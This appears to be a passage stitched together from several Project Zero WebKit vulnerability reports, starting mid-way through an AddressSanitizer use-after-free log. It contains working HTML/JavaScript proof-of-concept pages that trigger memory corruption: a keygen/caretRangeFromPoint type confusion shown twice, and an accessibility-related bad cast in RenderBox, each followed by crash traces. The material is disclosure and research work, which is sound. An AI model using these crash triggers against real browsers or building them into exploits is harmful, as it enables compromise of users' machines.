#1 0x10632602b in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x188902b)
#2 0x109148b53 in WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::expandCapacity(unsigned long, WebCore::FormAssociatedElement**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2fb53)
#3 0x109145d00 in void WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::insert<WebCore::FormAssociatedElement*&>(unsigned long, WebCore::FormAssociatedElement*&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2cd00)
#4 0x109145b80 in WebCore::HTMLFormElement::registerFormElement(WebCore::FormAssociatedElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2cb80)
#5 0x108ef9f98 in WebCore::FormAssociatedElement::setForm(WebCore::HTMLFormElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x9e0f98)
#6 0x108efa80e in WebCore::FormAssociatedElement::resetFormOwner() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x9e180e)
#7 0x109163a0d in WebCore::HTMLInputElement::finishedInsertingSubtree() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc4aa0d)
#8 0x1088827d8 in WebCore::ContainerNode::notifyChildInserted(WebCore::Node&, WebCore::ContainerNode::ChildChangeSource) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x3697d8)
#9 0x108882442 in WebCore::ContainerNode::updateTreeAfterInsertion(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x369442)
#10 0x108881f38 in WebCore::ContainerNode::appendChildWithoutPreInsertionValidityCheck(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x368f38)
#11 0x108884536 in WebCore::ContainerNode::appendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x36b536)
#12 0x10a364e8b in WebCore::Node::appendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1e4be8b)
#13 0x109ba6f87 in WebCore::JSNode::appendChild(JSC::ExecState&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x168df87)
#14 0x109ba4021 in WebCore::jsNodePrototypeFunctionAppendChildCaller(JSC::ExecState*, WebCore::JSNode*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x168b021)
#15 0x109ba0572 in long long WebCore::BindingCaller<WebCore::JSNode>::callOperation<&(WebCore::jsNodePrototypeFunctionAppendChildCaller(JSC::ExecState*, WebCore::JSNode*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1687572)
#16 0x109ba041e in WebCore::jsNodePrototypeFunctionAppendChild(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x168741e)
#17 0x2e505aa01027 (<unknown module>)
#18 0x105d07e9a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x126ae9a)
#19 0x105d014da in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12644da)
#20 0x1059a1c5d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf04c5d)
#21 0x105908033 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xe6b033)
#22 0x104f718d1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4d48d1)
#23 0x104f719fb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4d49fb)
#24 0x104f71d46 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4d4d46)
#25 0x1095a9e2e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1090e2e)
#26 0x109894c66 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x137bc66)
#27 0x108dea325 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8d1325)
#28 0x108de9e4f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8d0e4f)
#29 0x108db3275 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x89a275)
previously allocated by thread T0 here:
#0 0x103345bf0 in wrap_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4abf0)
#1 0x10631af5e in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x187df5e)
#2 0x1062b4f75 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1817f75)
#3 0x1091334b0 in WTF::VectorBufferBase<WebCore::FormAssociatedElement*>::allocateBuffer(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1a4b0)
#4 0x1091337d3 in WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::reserveCapacity(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1a7d3)
#5 0x109148b53 in WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::expandCapacity(unsigned long, WebCore::FormAssociatedElement**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2fb53)
#6 0x109145d00 in void WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::insert<WebCore::FormAssociatedElement*&>(unsigned long, WebCore::FormAssociatedElement*&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2cd00)
#7 0x109145b80 in WebCore::HTMLFormElement::registerFormElement(WebCore::FormAssociatedElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2cb80)
#8 0x108ef9f98 in WebCore::FormAssociatedElement::setForm(WebCore::HTMLFormElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x9e0f98)
#9 0x108efa25c in WebCore::FormAssociatedElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x9e125c)
#10 0x10913ae30 in WebCore::HTMLFormControlElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc21e30)
#11 0x10920b5c7 in WebCore::HTMLTextFormControlElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xcf25c7)
#12 0x1091639f8 in WebCore::HTMLInputElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc4a9f8)
#13 0x108893436 in WebCore::notifyNodeInsertedIntoDocument(WebCore::ContainerNode&, WebCore::Node&, WTF::Vector<WTF::Ref<WebCore::Node>, 11ul, WTF::CrashOnOverflow, 16ul>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x37a436)
#14 0x1088932d8 in WebCore::notifyChildNodeInserted(WebCore::ContainerNode&, WebCore::Node&, WTF::Vector<WTF::Ref<WebCore::Node>, 11ul, WTF::CrashOnOverflow, 16ul>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x37a2d8)
#15 0x108882697 in WebCore::ContainerNode::notifyChildInserted(WebCore::Node&, WebCore::ContainerNode::ChildChangeSource) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x369697)
#16 0x1088810ba in WebCore::ContainerNode::parserAppendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x3680ba)
#17 0x1090de9dc in WebCore::executeInsertTask(WebCore::HTMLConstructionSiteTask&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbc59dc)
#18 0x1090d7947 in WebCore::HTMLConstructionSite::executeQueuedTasks() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbbe947)
#19 0x109108828 in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbef828)
#20 0x1091083e2 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbef3e2)
#21 0x109107614 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbee614)
#22 0x10910906d in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbf006d)
#23 0x108b6e4a1 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6554a1)
#24 0x108ca0138 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x787138)
#25 0x108c645ef in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x74b5ef)
#26 0x10876f577 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x256577)
#27 0x10876a479 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x251479)
#28 0x10acc2f84 in WebCore::SubresourceLoader::didFinishLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27a9f84)
#29 0x101662f95 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8def95)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2be27) in WebCore::HTMLFormElement::reset()
Shadow bytes around the buggy address:
0x1c1800014530: fc fc fc fc fc fc fc fc fa fa fa fa fa fa fa fa
0x1c1800014540: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c1800014550: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c1800014560: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
0x1c1800014570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1c1800014580: fa fa fa fa fa fa fa fa fd fd[fd]fd fd fd fd fd
0x1c1800014590: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x1c18000145a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c18000145b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c18000145c0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x1c18000145d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1963==ABORTING
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=994
Chrome bug:
https://bugs.chromium.org/p/chromium/issues/detail?id=666246
PoC:
-->
<keygen id="keygen_element" style="position:absolute; height: 100px; width: 100px;">
<script>
var range = document.caretRangeFromPoint(50, 50);
var shadow_tree_container = range.commonAncestorContainer;
shadow_tree_container.prepend("foo");
keygen_element.disabled = true;
</script>
<!--
What happens here:
1. caretRangeFromPoint() allows accessing (and modifying) userAgentShadowRoot from JavaScript
2. HTMLKeygenElement::shadowSelect() blindly casts the first child of the userAgentShadowRoot to HTMLSelectElement without checking the Node type.
-->
<!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=999 -->
<keygen id="keygen_element" style="position:absolute; height: 100px; width: 100px;">
<script>
var range = document.caretRangeFromPoint(50, 50);
var shadow_tree_container = range.commonAncestorContainer;
shadow_tree_container.prepend("foo");
keygen_element.disabled = true;
</script>
<!--
What happens here:
1. caretRangeFromPoint() allows accessing (and modifying) userAgentShadowRoot from JavaScript
2. HTMLKeygenElement::shadowSelect() blindly casts the first child of the userAgentShadowRoot to HTMLSelectElement without checking the Node type.
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1038
There is a type confusion vulnerability that affects WebKit with accessibility enabled (WebCore::AXObjectCache::gAccessibilityEnabed).
PoC:
===============================
-->
<script>
function boom() {
m.append("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa");
m.setAttribute("aria-labeledby", "t");
d.open = false;
}
</script>
<body onload=boom()>
<title id="t">foo</title>
<menu id="m">
<details id="d" open="true">
<!--
===============================
Bad cast happens in RenderBox.h in
inline RenderBox* RenderBox::firstChildBox() const
{
return downcast<RenderBox>(firstChild());
}
The function expects that the first child is going to be of type RenderBox, but in the PoC it is actually of type RenderText.
This was tested on WebKitGTK+ 2.14.2 (latest stable version at this time). The PoC also crashes Safari on Mac, but only if the PoC is run while the Web Inspector / Error Console are enabled. It appears this behavior is caused by the fact that opening inspector enables accessibility features (via a call to AXObjectCache::enableAccessibility), while accessibility features are enabled in WebKitGTK+ by default through WebPageAccessibilityObjectAtk.
ASAN log follows.
=================================================================
==5530==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fd724fdca78 at pc 0x7fd72289499f bp 0x7ffc9e7a40b0 sp 0x7ffc9e7a40a8
READ of size 8 at 0x7fd724fdca78 thread T0
#0 0x7fd72289499e in WebCore::RenderBox::computeBlockDirectionMargins(WebCore::RenderBlock const&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) const /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBox.cpp:3260:21
#1 0x7fd7228a00b1 in WebCore::RenderBox::computeAndSetBlockDirectionMargins(WebCore::RenderBlock const&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBox.cpp:3270:5
#2 0x7fd7227faa45 in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:660:5
#3 0x7fd7227f6abe in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:632:9
#4 0x7fd7227f2d55 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:487:9
#5 0x7fd7227a24b7 in WebCore::RenderBlock::layout() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlock.cpp:1075:5
#6 0x7fd7227fb3a0 in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:709:9
#7 0x7fd7227f6abe in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:632:9
#8 0x7fd7227f2d55 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:487:9
#9 0x7fd7227a24b7 in WebCore::RenderBlock::layout() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlock.cpp:1075:5
#10 0x7fd7227fb3a0 in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:709:9
#11 0x7fd7227f6abe in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:632:9
#12 0x7fd7227f2d55 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:487:9
#13 0x7fd7227a24b7 in WebCore::RenderBlock::layout() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlock.cpp:1075:5
#14 0x7fd7227fb3a0 in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:709:9
#15 0x7fd7227f6abe in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:632:9
#16 0x7fd7227f2d55 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlockFlow.cpp:487:9
#17 0x7fd7227a24b7 in WebCore::RenderBlock::layout() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlock.cpp:1075:5
#18 0x7fd722c7d92f in WebCore::RenderView::layoutContent(WebCore::LayoutState const&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderView.cpp:244:5
#19 0x7fd722c7ee64 in WebCore::RenderView::layout() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderView.cpp:370:9
#20 0x7fd72221b17b in WebCore::FrameView::layout(bool) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/page/FrameView.cpp:1438:9
#21 0x7fd721495fe2 in WebCore::Document::updateLayout() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/dom/Document.cpp:2007:9
#22 0x7fd7214a2801 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/dom/Document.cpp:2039:5
#23 0x7fd721579993 in WebCore::Element::innerText() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/dom/Element.cpp:2518:5
#24 0x7fd720c6d821 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/accessibility/AccessibilityNodeObject.cpp:1887:16
#25 0x7fd720c7695c in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/accessibility/AccessibilityNodeObject.cpp:1930:44
#26 0x7fd720c77102 in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/accessibility/AccessibilityNodeObject.cpp:1955:12
#27 0x7fd720c773e9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/accessibility/AccessibilityNodeObject.cpp:1166:28
#28 0x7fd720c773e9 in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/accessibility/AccessibilityNodeObject.cpp:1963
#29 0x7fd720cc408b in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/accessibility/AccessibilityRenderObject.cpp:1356:9
#30 0x7fd720cac82c in WebCore::AccessibilityObject::accessibilityIsIgnored() const /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/accessibility/AccessibilityObject.cpp:2978:19
#31 0x7fd720cab793 in WebCore::AccessibilityObject::notifyIfIgnoredValueChanged() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/accessibility/AccessibilityObject.cpp:2870:22
#32 0x7fd72279df02 in WebCore::RenderBlock::makeChildrenNonInline(WebCore::RenderObject*) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlock.cpp:707:5
#33 0x7fd72279d37a in WebCore::RenderBlock::addChildIgnoringContinuation(WebCore::RenderObject*, WebCore::RenderObject*) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/rendering/RenderBlock.cpp:606:9
#34 0x7fd722eb34fa in WebCore::RenderTreePosition::insert(WebCore::RenderObject&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/style/RenderTreePosition.h:93:5
#35 0x7fd722eb34fa in WebCore::RenderTreeUpdater::createRenderer(WebCore::Element&, WebCore::RenderStyle&&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/style/RenderTreeUpdater.cpp:370
#36 0x7fd722eaec96 in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/style/RenderTreeUpdater.cpp:283:9
#37 0x7fd722eac9ad in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/style/RenderTreeUpdater.cpp:173:9
#38 0x7fd722eabdcf in WebCore::RenderTreeUpdater::commit(std::unique_ptr<WebCore::Style::Update, std::default_delete<WebCore::Style::Update> >) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/style/RenderTreeUpdater.cpp:120:9
#39 0x7fd7214a045e in WebCore::Document::recalcStyle(WebCore::Style::Change) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/dom/Document.cpp:1936:13
#40 0x7fd7214a1a4f in WebCore::Document::updateStyleIfNeeded() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/dom/Document.cpp:1982:5
#41 0x7fd7214a1a4f in WebCore::Document::implicitClose() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/dom/Document.cpp:2807
#42 0x7fd721f666e8 in WebCore::FrameLoader::checkCallImplicitClose() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/loader/FrameLoader.cpp:870:5
#43 0x7fd721f666e8 in WebCore::FrameLoader::checkCompleted() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/loader/FrameLoader.cpp:816
#44 0x7fd721f6101a in WebCore::FrameLoader::finishedParsing() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/loader/FrameLoader.cpp:737:5
#45 0x7fd7214da906 in WebCore::Document::finishedParsing() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/dom/Document.cpp:5228:9
#46 0x7fd721c66aca in WebCore::HTMLDocumentParser::end() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/html/parser/HTMLDocumentParser.cpp:406:5
#47 0x7fd721c66aca in WebCore::HTMLDocumentParser::attemptToRunDeferredScriptsAndEnd() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/html/parser/HTMLDocumentParser.cpp:415
#48 0x7fd721c66aca in WebCore::HTMLDocumentParser::prepareToStopParsing() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/html/parser/HTMLDocumentParser.cpp:135
#49 0x7fd721f480d3 in WebCore::DocumentWriter::end() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/loader/DocumentWriter.cpp:269:5
#50 0x7fd721f20e29 in WebCore::DocumentLoader::finishedLoading(double) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/loader/DocumentLoader.cpp:442:5
#51 0x7fd721f2a031 in WebCore::DocumentLoader::continueAfterContentPolicy(WebCore::PolicyAction) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/loader/DocumentLoader.cpp:829:13
#52 0x7fd721f25361 in WebCore::DocumentLoader::responseReceived(WebCore::CachedResource*, WebCore::ResourceResponse const&) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/loader/DocumentLoader.cpp:711:9
#53 0x7fd721f1b2a9 in WebCore::DocumentLoader::handleSubstituteDataLoadNow() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/loader/DocumentLoader.cpp:477:5
#54 0x7fd722434521 in WebCore::ThreadTimers::sharedTimerFiredInternal() /home/ifratric/webkit/webkitgtk-2.14.2/Source/WebCore/platform/ThreadTimers.cpp:121:9
#55 0x7fd71f10ff1b in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::operator()(void*) const /home/ifratric/webkit/webkitgtk-2.14.2/Source/WTF/wtf/glib/RunLoopGLib.cpp:162:9
#56 0x7fd71f10ff1b in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::__invoke(void*) /home/ifratric/webkit/webkitgtk-2.14.2/Source/WTF/wtf/glib/RunLoopGLib.cpp:160
#57 0x7fd717fcf059 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a059)
#58 0x7fd717fcf3ff (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a3ff)
